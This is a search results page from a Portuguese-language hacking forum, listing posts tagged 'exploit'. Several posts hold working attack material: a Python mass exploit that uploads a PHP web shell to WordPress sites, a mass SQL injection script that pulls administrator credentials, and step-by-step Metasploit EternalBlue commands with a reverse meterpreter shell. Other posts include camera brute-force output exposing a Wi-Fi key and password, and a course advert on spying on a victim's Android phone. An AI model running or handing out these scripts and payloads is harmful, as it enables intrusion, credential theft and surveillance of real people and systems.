Jump to content

Search the Community

Showing results for tags 'exploit'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Fsociety Brasil
    • Administration
    • Sugestões
    • Apresentação de Membros
  • Desenvolvimento
    • Ferramentas
    • Projetos
    • Programação
  • Segurança da Informação
    • Hacker
    • Cracker
    • Leaks
    • Engenharia Social
    • CTF
    • Bug Bounty
  • Sistemas Operacionais (S.O)
    • Linux
    • Windows
    • Mac
  • Hardware
    • Tutoriais e Ferramentas
    • Dúvidas e discussões
    • Arduino
    • Raspberry
  • Off-Topic
    • BioHacking
    • Games, Emuladores, Crack, Cheater e afins
    • Cursos, apostilas e livros
    • Ciência, Tecnologia, Sociologia, Filosofia e Psicologia
    • Notícias, novidades, acontecimentos e teorias da conspiração
    • Design
    • Random, dúvidas e discussões

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Location


Sex

Found 16 results

  1. Olá galera, venho humildemente requisitar a ajuda de vocês. Não sou novato na área, e possuo já um conhecimento prévio, mas os WORMs sempre chamaram a minha atenção justamente pela sua complexidade... Não encontro muito sobre o desenvolvimento dos mesmo, e gostaria de uma indicação sobre materiais de estudo ou de como funciona sua arquitetura... Pelo pouco que encontrei, entendi que um worm para que consiga se propagar por uma "rede" é uma junção autonoma de várias ferramentas bem conhecidas por nós, pois ele precisa realizar scan para encontrar falhas, realizar a exploração de falhas executando exploits e por fim conseguir realizar seu objetivo final (ransomware, backdoor, trojan e etc). Estou certo? Se alguém puder me ajudar, agradeço desde já! Um abraço a todos!
  2. Quero fazer um script que capture os elementos no aparelho android e faça o autoclic. A ideia é fazer como no vídeo do Hak5, onde ele utiliza um Rubber Ducky pra executar. É possível fazer algo do tipo para rodar pelo pendrive normal ou pelo SD direto no cel? Alguém tem alguma ideia de como criar?
  3. Minha dúvida é sobre como usar um exploit. Esse exploit é para versões do kernel 3.16.39 ou inferior, tá em C, já tentei compilar ele no proprio sistema, mas dá erro, dai eu vi uns videos onde eles carregam com metasploit, mas ficou mt vago, alguém poderia me dar um norte? https://www.exploit-db.com/exploits/44302/
  4. Aprenda como invadir um celular Android, utilizando ferramentas de exploits, assim como detetives, policias e seguranças da informação fazem. O que você vai aprender nesse curso: Criar um payload Android Tirar fotos e assistir o que a pessoa está fazendo em tempo real Navegar nos arquivos do celular Tirar print da tela do celular Capturar SMS, ligações e contatos Requisitos: Ter o Kali Linux instalado Módulos do curso: Introdução Criando aplicativo Dando start no payload Instalando aplicativo no celular da vitima Tendo acesso total ao celular da vitima *Com direito a certificado Clique aqui para acessar a pagina do curso
  5. Exploit Pack é um programa similar ao Metasploit, multiplataforma (Windows, Linux, MacOS) e com uma interface gráfica interessante. Contém vários exploits a disposição (aproximadamente 40000 na versão full) e te dá a opção de criar seus próprios exploits na linguagem que você quiser. Informações e download: http://exploitpack.com/ http://github.com/juansacco/exploitpack OBS: É necessário ter o java instalado para rodar o Exploit Pack. https://www.youtube.com/watch?v=LSeccatqOSo
  6. Exploit vazado da equipe de hacker @Yunkers Crew Exploit: https://github.com/2inf3rnal/foxcontact/ Video demostrativo do exploit https://www.youtube.com/watch?v=Z5HoCq4th7g Font: Yunkers Crew
  7. Ataque via ip que funciona apenas com windows 7. msfconsole ===scan pra saber se a vitima é vulneravel=== use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS (com s no final msm) ip da vitima exploit se a vitima for vulneravel aparecera um aviso na tela falando que a vitima pode ser atacada ===usando exploit=== use exploit/windows/smb/ms17_010_eternalblue set payload windows/(x64 para sistemas de 64 bits se nao for deixa sem nada e continua)/meterpreter/reverse_tcp set processname (nome que quiser para o processo) set LHOST (seu ip) set RHOST (ip da vitima) exploit
  8. Criei essa ferramenta integrada com um mecanismo de pesquisa de dispositivos conectados à Internet chamada shodan para pesquisar câmeras conectadas a internet, e por fim obter acesso á centenas de milhares de câmeras ao redor do mundo por exemplo Hong Kong, Tokyo, Russia, EUA, Coreia do Sul, Irã entre outros. Github https://github.com/fbctf/shodanwave Shadonwave Shodanwave é uma ferramenta para explorar e obter informações de câmeras especificamente da câmera IP Netwave. A ferramenta usa um mecanismo de busca chamado shodan que facilita a busca de câmeras on-line, mas não só isso. Hack câmeras de rede ao redor do mundo, muito divertido! Para que serve a ferramenta? Olhe, uma lista! Search Brute force SSID and WPAPSK Password Disclosure Exploit Aqui está um exemplo do shodanwave rodando ...... Uso: python shodanwave.py -u usernames.txt -w passwords.txt -k Shodan API key python shodanwave.py --help __ __ _____/ /_ ____ ____/ /___ _____ _ ______ __ _____ / ___/ __ \/ __ \/ __ / __ `/ __ \ | /| / / __ `/ | / / _ \ (__ ) / / / /_/ / /_/ / /_/ / / / / |/ |/ / /_/ /| |/ / __/ /____/_/ /_/\____/\__,_/\__,_/_/ /_/|__/|__/\__,_/ |___/\___/ This tool is successfully connected to shodan service Information the use of this tool is illegal, not bad. [+] Shodan successfully Connected. [+] Shodan Exploit Enabled. [+] Netwave IP Camera Found: 111307 [+] Passwords loaded: 12 [!] Disable password discovery module? (S/n): N [+] Launching brute force on host http://186.193.55.18:8080 [!] Password not found [!] Getting System Information [!] Getting Wireless System Information [+] Mac address found E8ABFA1A9374 [+] Host: http://186.193.55.18:8080 [+] Country: n/a [+] Organization: Nettel Telecomunicações Ltda. [+] Product: Netwave IP camera http config [+] SSID: moslekok [+] WPAPSK: TulSokanLoptatok [+] Starting to read memory dump.. this could take a few minutes [+] CTRL+C to exit.. [+] Binary data: 70560 [+] Strings in binary data found.. password should be around line 10000 10108 [+] Mac address triggered.. printing the following dumps, could leak username and passwords.. [+] Firstline... CAMERA2 [+] Possible username: admin [+] Possible password: ac00310 [+] Following line.. Requisitos de Instalação pip install -r /path/to/requirements.txt Referências: Shodan API search engine for Internet-connected devices. Requests Requests: HTTP for Humans Netwave Exploit Netwave IP Camera - Password Disclosure
  9. Olá pessoal, Criei um laboratório com uma máquina alvo Windows 7 x86, testando o Exploit eternalblue com doublepulsar na hora de exploitar aparece o seguinte erro: Error sending wrong architecture DLL to target Alguém já passou por esse erro e conseguiu resolver? OBS: Anexo print da tela do erro
  10. Eae pessoal, criei esse exploit em massa, para explorar uma vulnerabilidade no tema Inboundio, a qual lhe permite enviar arquivos (Shell) de forma arbitrária. #!/usr/bin/python #Escrito por Derick Santos #Conheca a FSociety Brasil: https://www.fsocietybrasil.org.br/ try: try: from colorama import * import colorama except: print "[!] ERRO! Necessario a biblioteca COLORAMA! Instale com - \n\n pip install colorama OU easy_install colorama" sys.exit(1) try: import requests except: print Fore.RED+"[!] ERRO! Necessario a biblioteca REQUESTS! Instale com - \n\n pip install requests OU easy_install requests" sys.exit(1) import platform import time import sys import os so = platform.system() if so == "Windows": cleaning = os.system("cls") else: cleaning = os.system("clear") try: lista = raw_input(Fore.WHITE+"Lista de sites: ") list = open(lista, "rb") except: print Fore.RED+"[!]"+Fore.WHITE+" Erro! O arquivo nao foi encontrado." for sites in list: sites = sites.rstrip() if "http://" not in sites: sites = "http://"+sites else: sites = sites print Fore.BLUE+"\n[!]"+Fore.WHITE+" SITE - {}\n".format(sites) payload = {"file" : "<?php system($_GET['shell']); ?>" } path_vul = "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php" id_vul = sites+path_vul id_process = requests.get(id_vul) if id_process.status_code == 200: print Fore.GREEN+"[!]"+Fore.WHITE+" O SITE PARECE SER VULNERAVEL!" time.sleep(3) print Fore.GREEN+"[!]"+Fore.WHITE+" Testando exploit!" exploiting = requests.post(id_vul,files=payload) if exploiting.status_code == 200: verifica_shell = requests.get("/inboundio-marketing/admin/partials/uploaded_csv/?shell=") if verifica_shell.status_code == 200: print Fore.GREEN+"[!]"+Fore.WHITE+" Shell upada! - {}".format(sites+"/inboundio-marketing/admin/partial/uploaded_csv/?shell=[CMD]") else: print Fore.RED+"[!]"+Fore.WHITE+" Shell nao upada!" else: print Fore.RED+"[!]"+Fore.WHITE+" SITE NAO VULNERAVEL!" else: print Fore.RED+"[!]"+Fore.WHITE+"SITE NAO VULNERAVEL!" except KeyboardInterrupt: print Fore.RED+"\n[!]"+Fore.WHITE+" Ate mais!" sys.exit(1)
  11. WEBSPERT_SQLinjection_mass_exploit E ai pessoal, criei esse exploit em massa que realiza SQL Injection via GET no "CMS" Webspert a qual esta vulneável a falha, e a partir desse exploit, conseguimos pegar a senha e o usuario do administrador. O exploit foi escrito em Python e necessário as bibliotecas: Requests e Colorama. Para instala-las: pip install requests/pip install colorama OU easy_install requests/easy_install colorama. #!/usr/bin/python try: try: from colorama import * import colorama except ImportError: print "[!] ERROR! Biblioteca colorama nao disponivel!\n Instale com: pip install colorama" sys.exit(1) import requests import platform import time import sys import os import re colorama.init() so = platform.system() if so == "Linux": cleaning = os.system("clear") else: cleaning = os.system("cls") print Fore.GREEN+""" *********************************** ***** MASS EXPLOIT ***** ***** WEBSPERT SQL INJECTION ***** ***** ***** *********************************** +++++++++++++++++++++++++++++++++++++++++++++++++ Desenvolvido por Derick Santos Conheca a Fsociety Brasil: https://www.fsocietybrasil.org/ """ web = raw_input(Fore.YELLOW+"Lista de sites: ") site = open(web) for sites in site: host = sites.rstrip() print Fore.BLUE+"\n[!] ALVO - {}\n".format(host) payload_id = "%27" r = requests.get("http://"+host+"/"+payload_id) code = r.text if r.status_code == 200: print Fore.BLUE+"[!] O SITE PARECE SER VULNERAVEL!" time.sleep(3) print Fore.GREEN+"\n[!] Aplicando payload de exploracao!" payload_vul = "&pageid=26 union all select 1,group_concat(user_name,0x3a,user_password),3,4,5,6 from administrators--" r = requests.get("http://"+host+payload_vul) html = r.text if re.search("admin",html): time.sleep(3) print Fore.GREEN+"\n[!] O SITE E VULNERAVEL!\n Coletando senha do administrador..." passe = re.findall(r'admin[\w:]+[\w,]+[\w:]+[\w:]+[\w<]', html) for senha in passe: password = senha.rstrip() if password == "administrator": print "" time.sleep(1) print Fore.GREEN+"\nUsername and password - \n {}".format(password) else: time.sleep(1) print Fore.GREEN+"\nUsername and password - \n {}".format(password) else: print Fore.RED+"\n[!] Site nao vulneravel!" except ImportError: print Fore.RED+"[!] ERROR! Biblioteca requests nao disponivel!\n Instale com: pip install requests" except KeyboardInterrupt: print Fore.RED+"Ate mais!"
  12. O Metasploit, como vocês já sabem é uma ferramenta que vale muito a pena estudar. Estou trazendo mais um vídeo com um módulo dele, ensinando a realizar SQL injection e conseguir meterpreter na aplicação através da falha. https://youtu.be/Wfm-Yu03Nn0
  13. COE RAPAZIADA.... Salve salve glr, estou aqui novamente trazendo agora a 2ª parte do tutorial sobre o EternalBlue & DoublePulsar. Bom no tutorial anterior eu falei um poquinho sobre os dois exploits e como adicioná los ao metasploit juntamente com um módulo auxiliar pra nos ajudar a verificar se o nosso alvo está vulnerável. Link da Parte 1: [TUTORIAL] Eternalblue & Doublepulsar - 1ª Parte CHEGA DE CONVERSA E BORA LÁAAAA Primeiramente vamos verificar se o nosso alvo está vulnerável usando o modulo auxiliar... msf > use auxiliary/scanner/smb/smb_ms17_010 msf auxiliary(smb_ms17_010) > set RHOST ip_do_seu_alvo msf auxiliary(smb_ms17_010) > run Se você receber uma resposta dessa forma, o host está vulnerável Bom, sabendo que o host está vulnerável vamos à exploração... \o/ Vamos selecionar o exploit e definir suas opções. Segue aí msf > use exploit/windows/smb/eternalblue_doublepulsar msf exploit(eternalblue_doublepulsar) > options .: DOUBLEPULSARPATH e ETERNALBLUEPATH :. Primeiro vamos definir o local onde está a pasta deps do exploit para as opções No meu caso está em /opt/metasploit/modules/exploits/windows/smb/deps/ msf exploit(eternalblue_doublepulsar) > set DOUBLEPULSARPATH /opt/metasploit/modules/exploits/windows/smb/deps/ msf exploit(eternalblue_doublepulsar) > set ETERNALBLUEPATH /opt/metasploit/modules/exploits/windows/smb/deps/ .: PROCESSINJECT :. Se seu alvo for x86 use wlms.exe, se for x64 use lsass.exe Como o nosso alvo é 64 bits, usaremos a 2 opção msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT lsass.exe .: RHOST :. Aqui vamos colocar o ip do alvo msf exploit(eternalblue_doublepulsar) > set RHOST ip_do_alvo .: TARGETARCHITECTURE :. Aqui você irá colocar a arquitetura do sistema alvo... (x86 ou x64) No meu caso o sistema é x64. msf exploit(eternalblue_doublepulsar) > set TARGETARCHITECTURE x64 .: WINEPATH :. Agora vamos colocar o local onde o wine está instalado seguido do drive onde a DLL será gerada, o /drive_c/ No meu caso ele está instalado na home do meu user... msf exploit(eternalblue_doublepulsar) > set WINEPATH /home/vitor/.wine/drive_c/ .: TARGET :. Falta agora apenas definirmos o sistema alvo, para ver os sistemas disponíveis utilize o comando show targets Depois de escolher o target correto, vamos setar o id. Estou usando o windows 7 como alvo msf exploit(eternalblue_doublepulsar) > set target 9 ou msf exploit(eternalblue_doublepulsar) > set target 0 PRONTO!!! NOSSO EXPLOIT JÁ ESTÁ PRONTO PARA SER USADO. MAS.... FALTA O NOSSO PAYLOAD .: PAYLOAD :. Irei usar o meterpreter na versão x64, mas fica a seu critério de qual payload usar msf exploit(eternalblue_doublepulsar) > set payload windows/x64/meterpreter/reverse_tcp .: LHOST :. Vamos agora configurar o host que receberá a conexão reversa... msf exploit(eternalblue_doublepulsar) > set LHOST seu_ip TUDO PRONTO!!! AGORA É SÓ EXPLOITAR E VER SE TUDO OCORREU BEM \o/ msf exploit(eternalblue_doublepulsar) > exploit Bom galera, se tudo ocorrer bem uma sessão no meterpreter será aberta, como mostra a imagem abaixo Em breve, postarei um vídeo sobre tudo isso que foi dito acima Por hoje é só galera !!! Qualquer dúvida, crítica, sugestão só comentar aí pessoal Abraço !!!! ________________________________________________________________________________________________________
  14. Opa pessoal, é meu primeiro tópico aqui no forum, então desculpa qualquer coisa Galera, esse tutorial vai ser dividido em 2 partes, essa primeira parte é onde você vai adicionar tudo que é preciso pra explorar a falha... Recentemente, algumas ferramentas da NSA foram vazada por um grupo de hackers denominados The Shadow Brokers, entre elas estão dois exploits voltado para sistemas Windows, o primeiro denominado Eternalbue e o segundo DoublePulsar . O Eternalblue explora uma vulnerabilidade de execução remota de código nos protocolos SMBv1 e NBT sobre as portas TCP 445 e 139 respectivamente. Já o DoublePulsar é usado para injetar arquivos DLL's juntamente com um payload. Até agora as versões que são afetadas pelo exploit... 1 Windows XP (all services pack) (x86) (x64) 2 Windows Server 2003 SP0 (x86) 3 Windows Server 2003 SP1/SP2 (x86) 4 Windows Server 2003 (x64) 5 Windows Vista (x86) 6 Windows Vista (x64) 7 Windows Server 2008 (x86) 8 Windows Server 2008 R2 (x86) (x64) 9 Windows 7 (all services pack) (x86) (x64) Bom, hoje venho trazer pra vocês um tutorial pra adicionar os exploits ao Metasploit... Então vamos lá.... .: Requisitos :. Metasploit Wget Git .: Adicionando os exploits no Metasploit :. 1. Primeiramente vamos ter que adicionar os 2 exploits ao Metasploit e um módulo auxiliar, é rápido e facil... Segue aí 1.1 Vamos baixar primeiramente o módulo auxiliar que vai nos ajudar a verificar se o nosso alvo é vulnerável ao MS17-010 e adicioná-lo ao nosso Metasploit. wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb 1.2 Depois de baixado o arquivo, você deverá movê-lo para a pasta /modules/auxiliary/scanner/smb/ no caminho de instalação do seu metasploit... No meu sistema ele se encontra em /opt/metasploit/, no meu caso vai ficar dessa forma... # mv smb_ms17-010.rb /opt/metasploit/modules/auxiliary/scanner/smb/ 1.3 Agora vamos baixar os exploits \o/!!!! git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git 1.4 Depois de baixado o repositório, vamos colocar os arquivos dos exploits no nosso querido metasploit . Para adicionar é o mesmo processo anterior, só que vamos mudar apenas o caminho que será agora /modules/exploits/windows/smb/ OBS: Vamos copiar apenas o eternalblue_doublepulsar.rb e a pasta deps # cd Eternalblue-Doublepulsar-Metasploit # mv deps eternalblue_doublepulsar.rb /opt/metasploit/modules/exploits/windows/smb/ Finish!!! Já está tudo pronto para a próxima fase UHUUUUUUUUU \o/ Por Hoje é só galera, no próximo post irei ensinar a vocês a explorar a falha... Abraço !!!!
  15. ESCALANDO PRIVILÉGIOS com EXPLOIT DIRTY COW A escalação de privilégios, é uma técnica a qual um hacker/cracker invade o sistema e utiliza de exploits ou PoCs (Proof of Concept) para ganhar acessos administrativos ou seja, acessos de superusuarios independente do sistema. Hoje eu trago pra vocês, uma demonstração de uma escalada de privilégios através do exploit Dirty Cow.
  16. Scan exploit cve-2017-010 Eternalblue-doublepulsar Ta ai um scanner pra verificar se o sistema alvo esta vulnerável a falha ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## # auxiliary/scanner/smb/smb_ms_17_010 require 'msf/core' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Exploit::Remote::SMB::Client::Authenticated include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'MS17-010 SMB RCE Detection', 'Description' => %q{ Uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does not have the MS17-010 patch. This module does not require valid SMB credentials in default server configurations. It can log on as the user "\\" and connect to IPC$. }, 'Author' => [ 'Sean Dillon <[email protected]>' ], 'References' => [ [ 'CVE', '2017-0143'], [ 'CVE', '2017-0144'], [ 'CVE', '2017-0145'], [ 'CVE', '2017-0146'], [ 'CVE', '2017-0147'], [ 'CVE', '2017-0148'], [ 'MSB', 'MS17-010'], [ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx'] ], 'License' => MSF_LICENSE )) end def run_host(ip) begin status = do_smb_probe(ip) if status == "STATUS_INSUFF_SERVER_RESOURCES" print_warning("Host is likely VULNERABLE to MS17-010!") report_vuln( host: ip, name: self.name, refs: self.references, info: 'STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$' ) elsif status == "STATUS_ACCESS_DENIED" or status == "STATUS_INVALID_HANDLE" # STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others) print_good("Host does NOT appear vulnerable.") else print_bad("Unable to properly detect if host is vulnerable.") end rescue ::Interrupt print_status("Exiting on interrupt.") raise $! rescue ::Rex::Proto::SMB::Exceptions::LoginError print_error("An SMB Login Error occurred while connecting to the IPC$ tree.") rescue ::Exception => e vprint_error("#{e.class}: #{e.message}") ensure disconnect end end def do_smb_probe(ip) connect # logon as user \ simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain']) # connect to IPC$ ipc_share = "\\\\#{ip}\\IPC$" simple.connect(ipc_share) tree_id = simple.shares[ipc_share] print_status("Connected to #{ipc_share} with TID = #{tree_id}") # request transaction with fid = 0 pkt = make_smb_trans_ms17_010(tree_id) sock.put(pkt) bytes = sock.get_once # convert packet to response struct pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct pkt.from_s(bytes[4..-1]) # convert error code to string code = pkt['SMB'].v['ErrorClass'] smberr = Rex::Proto::SMB::Exceptions::ErrorCode.new status = smberr.get_error(code) print_status("Received #{status} with FID = 0") status end def make_smb_trans_ms17_010(tree_id) # make a raw transaction packet pkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct simple.client.smb_defaults(pkt['Payload']['SMB']) # opcode 0x23 = PeekNamedPipe, fid = 0 setup = "\x23\x00\x00\x00" setup_count = 2 # 2 words trans = "\\PIPE\\\x00" # calculate offsets to the SetupData payload base_offset = pkt.to_s.length + (setup.length) - 4 param_offset = base_offset + trans.length data_offset = param_offset # + 0 # packet baselines pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION pkt['Payload']['SMB'].v['Flags1'] = 0x18 pkt['Payload']['SMB'].v['Flags2'] = 0x2801 # 0xc803 would unicode pkt['Payload']['SMB'].v['TreeID'] = tree_id pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count pkt['Payload'].v['ParamCountMax'] = 0xffff pkt['Payload'].v['DataCountMax'] = 0xffff pkt['Payload'].v['ParamOffset'] = param_offset pkt['Payload'].v['DataOffset'] = data_offset # actual magic: PeekNamedPipe FID=0, \PIPE\ pkt['Payload'].v['SetupCount'] = setup_count pkt['Payload'].v['SetupData'] = setup pkt['Payload'].v['Payload'] = trans pkt.to_s end end
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.